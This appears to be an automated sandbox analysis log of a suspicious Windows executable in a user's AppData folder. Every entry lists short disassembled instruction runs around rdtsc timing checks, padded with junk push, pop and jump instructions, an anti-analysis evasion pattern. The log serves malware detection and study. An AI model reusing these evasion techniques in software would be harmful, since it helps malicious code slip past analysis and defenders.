Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BDCEF second address: 9BDD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F5828704A6Fh 0x0000000b popad 0x0000000c pop ebx 0x0000000d ja 00007F5828704A86h 0x00000013 jmp 00007F5828704A76h 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BDE96 second address: 9BDE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BDE9B second address: 9BDEC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A78h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F5828704A66h 0x00000010 jno 00007F5828704A66h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BDEC3 second address: 9BDEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C13F second address: 96C153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C153 second address: 96C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C159 second address: 96C15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96C15D second address: 96C199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5828CEC318h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5828CEC30Ah 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BE300 second address: 9BE31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828704A79h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BE31F second address: 9BE323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BEC48 second address: 9BEC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9BEC4C second address: 9BEC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C75C5 second address: 9C75E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F5828704A73h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C75E4 second address: 9C7600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F5828CEC31Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C568E second address: 9C5692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C5BFA second address: 9C5C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828CEC317h 0x0000000a push eax 0x0000000b jmp 00007F5828CEC313h 0x00000010 jmp 00007F5828CEC30Ch 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C5C3A second address: 9C5C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C5C46 second address: 9C5C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C5C4C second address: 9C5C5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C62A8 second address: 9C62AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9C7012 second address: 9C7023 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CBE78 second address: 9CBEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5828CEC30Fh 0x0000000a jmp 00007F5828CEC315h 0x0000000f pushad 0x00000010 jo 00007F5828CEC306h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5828CEC313h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CBEC4 second address: 9CBED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828704A66h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CBED2 second address: 9CBED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CF256 second address: 9CF25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CF6B8 second address: 9CF6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CF6BD second address: 9CF6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A75h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F5828704A6Ch 0x00000014 pushad 0x00000015 popad 0x00000016 jl 00007F5828704A66h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CF6F2 second address: 9CF6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CFA99 second address: 9CFAA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CFAA4 second address: 9CFAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CFAA9 second address: 9CFAAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9CFAAE second address: 9CFADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push ecx 0x00000008 jc 00007F5828CEC306h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007F5828CEC320h 0x00000019 jmp 00007F5828CEC30Ch 0x0000001e je 00007F5828CEC30Eh 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7CA2 second address: 9D7CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A79h 0x0000000a pop ebx 0x0000000b jbe 00007F5828704A89h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F5828704A66h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7CCF second address: 9D7CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7E3D second address: 9D7E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5828704A66h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f jne 00007F5828704A66h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7F96 second address: 9D7F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7F9A second address: 9D7F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7F9E second address: 9D7FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7FA6 second address: 9D7FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5828704A66h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5828704A78h 0x00000015 jng 00007F5828704A66h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7FD4 second address: 9D7FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D8AF9 second address: 9D8AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D8AFF second address: 9D8B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D8B04 second address: 9D8B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D8B0E second address: 9D8B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D91B1 second address: 9D91E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5828704A79h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5828704A77h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D91E7 second address: 9D91EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9D7185 second address: 9D718A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9DED4C second address: 9DED50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9DED50 second address: 9DED54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9EBCF1 second address: 9EBCFB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9EBCFB second address: 9EBD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F5828704A66h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9EB99B second address: 9EB9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9EB9A1 second address: 9EB9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828704A77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9EF510 second address: 9EF52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Fh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jns 00007F5828CEC306h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A011C5 second address: A011C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A011C9 second address: A011ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC315h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A09634 second address: A0963F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A0963F second address: A0966A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F5828CEC306h 0x0000000c jne 00007F5828CEC306h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F5828CEC311h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A07EE3 second address: A07EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A07EE9 second address: A07EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A0802E second address: A08036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A08036 second address: A08047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5828CEC30Ch 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A0DB51 second address: A0DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A73h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A176C4 second address: A176D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F5828CEC306h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A176D2 second address: A176EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A176EF second address: A176F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A1C156 second address: A1C166 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A1C166 second address: A1C186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC318h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A1C186 second address: A1C18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A20821 second address: A2083D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A22122 second address: A2213A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F5828704A66h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push esi 0x00000010 jl 00007F5828704A66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A32A44 second address: A32A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5828CEC306h 0x00000009 jnp 00007F5828CEC306h 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4ACC8 second address: A4ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4AF95 second address: A4AF9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828CEC306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4AF9F second address: A4AFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4AFA8 second address: A4AFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4AFB4 second address: A4AFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5828704A66h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4AFBE second address: A4AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5828CEC316h 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4B349 second address: A4B35C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4B776 second address: A4B77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4B8D9 second address: A4B8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4D26C second address: A4D272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4D272 second address: A4D284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4FD68 second address: A4FD6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4FE14 second address: A4FE1E instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A4FE1E second address: A4FE23 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A50134 second address: A50138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A50138 second address: A5013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A5013E second address: A50144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A50144 second address: A50148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A50148 second address: A5014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A531C6 second address: A531CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A52D9B second address: A52DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
